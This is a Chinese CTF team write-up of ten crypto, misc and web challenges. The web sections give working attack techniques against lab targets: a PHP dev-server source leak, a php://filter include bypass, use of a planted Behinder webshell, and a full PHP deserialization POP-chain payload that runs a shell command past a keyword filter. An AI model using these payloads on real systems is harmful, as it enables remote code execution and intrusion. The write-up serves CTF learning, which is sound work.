师傅们,我太菜了,除了最后一个小时都还在前20名,结果最后一个小时被踢下去了,做了一道少解的题目也掩饰溃败,被打服了,直接被踢出前40名,babyrsa到底怎么解,呜呜!被打服了!!!!!!!以下是我们队伍的10道题目的wp。
题目一 Crypto-我看看谁还不会RSA
操作内容:
看到该题之后发现是私钥加密,公钥解密
脚本代码:
from Crypto.Util.number import *
c=8232151627233115772131180151146951323147507324390914513031444555762539986162650
p=8666789885346075954502743436174521501697
q=2449101960789395782044494299423558347143
n = p*q
phin = (p-1)*(q-1)
e=37777
m = pow(c,e,n)
print(long_to_bytes(m))
flag值:
flag{r5a_Who_w0nt}
题目二 Misc-来都来了
操作内容:
打开压缩包发现有密码
用010工具打开发现是伪加密
把09改为00,之后即可解压缩,压缩之后的内容为
Base64解密之后把解密内容缩小
flag值:
flag{cp2ae315-eef4-3fra-a768-cd9xb19cdk4e}
题目三 Cypto-hakiehs
操作内容:
通过图片形式打开,有3种类型的密码
在网上查找到了3种密码对应的密码表
对应密码表得到相应的字母是linkzeldadanon及为flag
flag值:
flag{linkzeldaganon}
题目四 Misc-Honor
操作内容:
foremost分离图片:foremost -T 图片
发现有一个jpg文件
用stegdetect分析存在隐写
用stegseek使用rockyou输入命令爆破密码
进行栅栏w型解密
flag值:
flag{424c076e-768c-3636-acb5-4676900b9eec}
题目五 get_source
操作内容:
访问页面发现无内容,但通过返回包可发现php版本7.4.21
可利用Development Server源码泄露漏洞源码泄露漏洞
得到源码后分析,md5和sha1可用数组绕过
post传参a[]=1&b[]=2&pwn[]=1 访问页面得到flag
flag值:
动态flag不给了
题目六 Web-ApeCoin
操作内容:
页面无明显漏洞点 考虑源码泄露
在static/font目录下发现可疑文件.txt.php
打开后发现为冰蝎马
根据特征解密得到链接密码74658263
冰蝎链接找到flag
flag值:
flag{59366e97-4d45-4338-9056-4f06b0493df2}
题目七 Web-Easyphp
操作内容:
进入页面发现require_once文件包含
但flag.php已被包含过一次
用用伪协议配合多级符号链接的办法进行绕过
php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/share/nginx/html/index.php
但是发现flag为假
之后考虑包含页面出现的hint.php
发现该页面反序列化命令执行
源代码为
<?php error_reporting(0); class mouse { public $rice; function __isset($n){ $this->rice->nothing(); } } class dog { public $a; public $b; public $c; function __wakeup(){ $this->a = 'chance?'; } function __destruct(){ $this->b = $this->c; die($this->a); } } class ct { public $fish; function __toString() { if(isset($this->fish->d)) { echo 'you wrong'; } } } class get { public $cmd; function __call($name,$no) { eval($this->cmd); } } $pop = $_GET['pop']; if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|base|echo|cp|\$|\*|\+|\^|scan|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$pop)){ echo "you will get flag".''; unserialize($pop); } else{ die("Try again!"); } 分析反序化链 从 dog->ct->mouse->get构造 payload 绕过正则 编写反序列化脚本 <?php class mouse { public $rice; function __construct() { $this->rice = new get; } } class dog { public $a; public $b; public $c; function __construct() { $this->a = 'chance?'; $this->b = &$this->a; $this->c = new ct; } } class ct { public $fish; function __construct() { $this->fish = new mouse; } } class get { public $cmd; function __construct() { $this->cmd = 'print(`c\at /realflag/you_want_flag.php`);'; } } print_r(serialize(new dog)); 运行得到 O:3:"dog":3:{s:1:"a";s:7:"chance?";s:1:"b";R:2;s:1:"c";O:2:"ct":1:{s:4:"fish";O:5:"mouse":1:{s:4:"rice";O:3:"get":1:{s:3:"cmd";s:42:"print(`c\at /realflag/you_want_flag.php`);";}}}} 传参后f12得到flag  ##### flag值: 动态flag,不给了 #### 题目八 ezupload ##### 操作内容: 爆破目录发现/flag目录下有内容 访问发现为flag  ##### flag值: flag{4a384594-7550-4544-b256-66d18640a478} #### 题目九 Crypto-font ##### 操作内容:脑洞一套炸了 打开图片详细信息  ◎☀◐♬¤☾♀☹☽§♪℗♩☑♪®♂¤☒♫〼♪۞◐§◎☀◐◑☼♭©☺♪√ ☑◑☼√♬◎〼©♂☑√۞☽♩☺☀☑◑☀√☑♩☒♂☑☀☹♪ 通过在浏览器上发现了一句英文串描述该图片  theQuickbrownfoxjumpsoverthelazydog, 发现与◎☀◐♬¤☾♀☹☽§♪℗♩☑♪®♂¤☒♫〼♪۞◐§◎☀◐◑☼♭©☺♪√一一对应正好36个 字母表为 √:g;♪:0;☺ d;© y;♭ z;☼ a;◑ l;◐ e;☀ h;◎ t;§ r;◐ e;۞ v;♪ o;〼 s;♫ p;☒ m;¤ u;♂ j;® x;♪ o;☑ f;♩ n;℗ w;♪ o;§ r;☽ b;☹ k;♀ c;☾ i;¤ u;♬ q;◐ e;☀ h;◎ t 根据☑◑☼√♬◎〼©♂☑√۞☽♩☺☀☑◑☀√☑♩☒♂☑☀☹♪一一对应到字母表上 是qtsyjfgvbndhflhgfnmjfhko就是flag ##### flag值: flag{qtsyjfgvbndhflhgfnmjfhko} #### 题目十 Misc-芙宁娜 ##### 操作内容: 某电信原题,最后8e8f,不好多说,之前的wp也可水 'ZmxhZ3tiYzgzOTRhYS03ZTMyLTQ3ZTgtYTlmZC0xYmY2ODNhZg=='   flag{bc8394aa-7e32-47e8-a9fd-1bf683af 通过ps的元数据可以得到被遮盖的16进制编码,通过重组还原得到⼀个pyc⽂ 件,pyc隐写得到8e8f} 拼接可得flag ##### 第二种方法: 爆破找几个慢慢提交,反正没有提交限制,就是流量大,比赛时候,真的只有这个方法最实用 import string chars = string.ascii_lowercase + string.digits flag = "flag{bc8394aa-7e32-47e8-a9fd-1bf683af" with open(r"C:\Users\Administrator\Desktop\23.txt", "w") as file: for a in chars: for b in chars: for c in chars: for d in chars: current_flag = flag + a + b + c + d + "}" file.write(current_flag + "\n") print("结果已保存在桌面上") 爆破脚本附上! ##### flag值: flag{bc8394aa-7e32-47e8-a9fd-1bf683af8e8f}版权归原作者 tlp_zzm 所有, 如有侵权,请联系我们删除。